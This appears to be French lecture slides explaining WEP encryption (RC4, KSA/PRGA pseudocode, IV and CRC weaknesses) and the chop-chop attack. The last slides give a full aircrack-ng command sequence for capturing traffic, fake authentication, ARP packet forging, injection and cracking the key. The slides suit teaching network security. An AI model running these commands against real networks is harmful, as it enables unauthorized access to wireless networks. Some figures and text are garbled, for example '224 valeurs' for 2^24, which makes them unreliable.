2. • Type de réseau
– LAN (Local Area Network)
– MAN (Metropolitan Area network)
– WAN (Wide Area Network)
• Qu’est ce qu’un réseau Wi-Fi?
– Ondes radioélectriques
– Standards 802.11
4. WEP(Wired Equivalent Privacy)
• Qu’est ce que le WEP?
– Fait partie de la norme internationale IEEE 802.11
– Une solution de confidentialité équivalente à un réseau
filaire
– Employé dans un WLAN pour :
» La confidentialité
» L’authentification
» L’intégrité
5. WEP(Wired Equivalent Privacy)
• Il est défini comme :
– assez for: pour les clés longue (brute force)
– à synchronisation automatique: les paquets sont autonomes
– efficace : rapides (chiffrement et déchiffrement)
– normalement exportable : longueur de clé variable
– optionnel : l’utilisation du WEP est optionnel
6. Le chiffrement WEP
• Il repose sur l’algorithme à clé symétrique RC4
• Le chiffrement se décompose en plusieurs
phases :
– La création de la graine :IV+clé
– La création du keystream
– Le calcul ICV « Integrity Check Value »
– La constitution du message final et son encapsulation dans
une trame
7. L’algorithme RC4 dans WEP
RC4
– Symétrique
– Chiffrement par flux
– Différentes tailles de clé jusqu’à 256 bit
– Il est extrêmement rapide
Fonctionement
• On génère un flux de données de taille identique au
flux de données claires et on fait un XOR entre les
deux
8. Initialisation de la clé
• Deux longueurs de clé WEP
– Clé (40 bits, soit 5 octets ) + IV = 64 bits
– Clé (104 bits, soit 13 octets) + IV = 128 bits
Graine
IV : vecteur d’initialisation est une séquence de bits qui change régulièrement
9. Table «S» initialisée
Mélange du tableau KSA
pour i de 0 à 255 faire
T[i]=i
fin pour
y ← 0
pour x de 0 à 255 faire
y ← y + T[x] + S[x] (modulo 256)
T[x] ↔ T[y]
fin pour
10. Pseudo Random Generator Algorithm PRGA
PRGA(T) :
x ← 0
y ← 0
x ← x+1
y ← y+T[x]
T[x] ↔ T[y]
z ← T[x] + T[y] (modulo 256)
renvoie T[z]
Obtention du keystream =>
14. Les principales failles du WEP sont
essentiellement les suivantes :
• Les algorithmes de vérification d’intégrité et d’authentification
sont très facilement contournables.
• Possibilité de construire des dictionnaires fournissant en fonction
d’un IV, le keystream.
• L’algorithme de chiffrement RC4 présente des clés faibles et
l’espace disponible pour les IV est trop petit.
•
• Une même clé est utilisée pour tout le réseau et les clés de
chiffrement sont statiques .
• Clés courtes 40 bits (5 caractères !!!) ou 104 bits et/ou trop
simples (attaque par dictionnaire)
15. Les faiblesses du IV
IV moins de 17 millions de combinaisons
forte possibilité de Collisions
Sniffer le réseau : ETHEREAL, WIRESHARK (la
carte Wi-Fi en mode monitor)
16. Attaques contre le WEP
L’attaque chop-chop
• Le WEP utilise un contrôle de redondance cyclique ICV
• Le CRC permet de s’assurer de l’intégrité des données mais en
aucun cas de leur sécurité
• L’attaque chop-chop va donc utiliser cette faiblesse pour
injecter des paquets sur le réseau.
17. Trame1 Trame 2
ajout 1 octet
de données
_____ DATA ___ ___ICV ___
D0 D1 D2 D3 D4 I3 I2 I1 I0
+ + + + + + + + +
K0 K1 K2 K3 K4 K5 K6 K7 K8
= = = = = = = = =
R0 R1 R2 R3 R4 R5 R6 R7 R8
_____ DATA ____ ___ICV ___
D0 D1 D2 D3 D4 D5 J3 J2 J1 J0
+ + + + + + + + + +
K0 K1 K2 K3 K4 K5 K6 K7 K8 K9
= = = = = = = = = =
S0 S1 S2 S3 S4 S5 S6 S7 S8 S9
Il est possible de passer du paquet 2 au paquet 1 en devinant la valeur de la
somme I3+D5 (1 chance sur 256). On note X = I3 + D5.
18. Suite L’attaque chop-chop
scan des réseaux wifi
airodump-ng -w out -c 10 --encrypt wep --bssid
00:16:41:C9:E0:3F wlan0
on se fait passer pour un client: fake authentification
aireplay-ng wlan0 -1 30 -e nom_wifi -a 00:16:41:C9:E0:3F
-h 00:12:F0:6F:ED:38
19. L'attaque Chopchop
aireplay-ng -4 wlan0 -a 00:16:41:C9:E0:3F -h
00:12:F0:6F:ED:38
=> resultat : 2 fichiers .cap et .xor
Forger un paquet ARP avec Packetforge-ng
packetforge-ng -0 -a 00:16:41:C9:E0:3F -h
00:12:F0:6F:ED:38 -k 192.168.1.1 -l 192.168.1.10 -y
.xor -w arp.cap
20. L'injection: Aireplay-ng -3, arp replay
#aireplay-ng -3 -e nom_wifi -a 00:16:41:C9:E0:3F -h
00:12:F0:6F:ED:38 -x600 -r arp.cap wlan0
Le crack de la clé wep avec Aircrack-ng
#aircrack-ng out-01.cap
Deux étapes sont nécessaires pour l’opération de chiffrement :
• L’initialisation de la clé
• La réalisation du cryptogramme (texte chiffré ou cyphertext)
IV est de 24 bits, soit 224 valeurs possibles (transporter en claire ds les trames)
Collision : avoir des trame chiffré avec la même clé ,
Facile à détecter vu que l’ IV circule en claire
Le CRC permet de s’assurer de l’integrité des donnees mais en aucun cas de leur sécurité
L’attaque chop-chop va donc utiliser cette faiblesse pou ´ r injecter des paquets sur le reseau.